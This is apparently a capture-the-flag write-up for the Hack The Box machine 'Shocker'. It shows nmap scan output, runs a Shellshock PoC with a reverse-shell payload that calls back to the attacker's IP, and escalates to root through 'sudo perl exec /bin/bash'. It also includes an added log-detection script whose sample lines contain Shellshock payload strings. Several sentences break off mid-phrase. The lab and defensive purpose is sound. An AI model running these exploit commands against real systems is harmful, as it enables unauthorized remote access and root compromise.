nmap -sC -sV -oA nmap -v 10.10.10.56
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-21 16:04 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 16:04
Completed Parallel DNS resolution of 1 host. at 16:04, 0.01s elapsed
Initiating Connect Scan at 16:04
Scanning 10.10.10.56 [1000 ports]
Discovered open port 80/tcp on 10.10.10.56
Discovered open port 2222/tcp on 10.10.10.56
Completed Connect Scan at 16:04, 0.42s elapsed (1000 total ports)
Initiating Service scan at 16:04
Scanning 2 services on 10.10.10.56
Completed Service scan at 16:04, 6.05s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.56.
Initiating NSE at 16:04
Completed NSE at 16:04, 0.89s elapsed
Initiating NSE at 16:04
Completed NSE at 16:04, 0.11s elapsed
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
Nmap scan report for 10.10.10.56
Host is up (0.028s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
From our scan we see that the services below are available.
First taking a look at the HTTP server we find a basic page. The source of the page doesn’t reveal anything.
Running dirbuster with a standard wordlist we find a cgi-bin folder. Given that the name of the box is Shocker, we can assume the attack is a Shellshock attack.
Using dirbuster again we can fuzz for
After a few seconds we find a
The exploit for this box is the well known Apache mod_cgi - 'Shellshock' Remote Command Injection exploit.
The syntax for executing the PoC is:
python 34900.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.16 lport=4555 pages=/cgi-bin/user.sh
payload: Can be either a reverse or bind shell
rhost: The IP/hostname of the server
lhost: The IP of our system
lport: The port where the shell will establish connection
pages: The URL to the
Executing this will immediately grant us shell access as the user shelly, and the user.txt file can be found at
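Seen from the server side, a probe like this leaves a recognisable trace in the Apache access log. The script below is an added example, not code from the original writeup or from the PoC it cites: it parses combined-format log lines and flags any request whose request line or logged header fields carry the bash function-definition marker that Shellshock depends on. The sample log lines are constructed, with only the /cgi-bin/user.sh path and the attacker IP taken from the writeup.

```python
"""Flag Shellshock-style probes in Apache access log lines.

Added example, not code from the writeup or the PoC it cites. The sample
lines are constructed: /cgi-bin/user.sh is from the writeup, the rest is made up.
"""
import re

# Apache combined format: ip ident user [time] "request" status size "referer" "agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Shellshock smuggles a bash function definition into an environment variable.
# mod_cgi exports request headers to the CGI environment, so the marker shows
# up in the logged header fields or the request line. Spacing varies, so the
# pattern is deliberately loose.
SHELLSHOCK_MARKER = re.compile(r'\(\s*\)\s*\{')

def parse_line(line):
    """Return the fields of one combined-format line, or None if unparseable."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None

def detect_shellshock(lines):
    """Return one finding per log line carrying the marker in any logged field."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable; a real deployment should count these too
        hits = [f for f in ("request", "referer", "agent")
                if SHELLSHOCK_MARKER.search(rec[f])]
        if not hits:
            continue
        parts = rec["request"].split()
        path = parts[1] if len(parts) > 1 else ""
        findings.append({"ip": rec["ip"], "time": rec["time"], "fields": hits,
                         "cgi": path.startswith("/cgi-bin/")})
    return findings

SAMPLE_LOG = [  # constructed
    '10.10.14.16 - - [21/Mar/2020:16:10:01 -0400] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0"',
    '10.10.14.16 - - [21/Mar/2020:16:10:05 -0400] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :; }; echo probe"',
    '10.10.14.16 - - [21/Mar/2020:16:10:09 -0400] "GET /cgi-bin/user.sh HTTP/1.1" 500 0 "(){ :;};echo probe" "curl/7.68.0"',
    'not a log line',
]

if __name__ == "__main__":
    for finding in detect_shellshock(SAMPLE_LOG):
        print(finding)
```

The same marker check applies to any header a CGI handler exports, so a real deployment would run it over every logged field, not just the three the combined format records.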
Now that we have a shell as a user, our task is to escalate our privileges to root. By running sudo -l we find that we have permission to run sudo /usr/bin/perl as root with no password.
This can easily be exploited, as perl can execute other programs. By running sudo /usr/bin/perl -e 'exec "/bin/bash";' we now have a bash session as root and can find the root.txt file in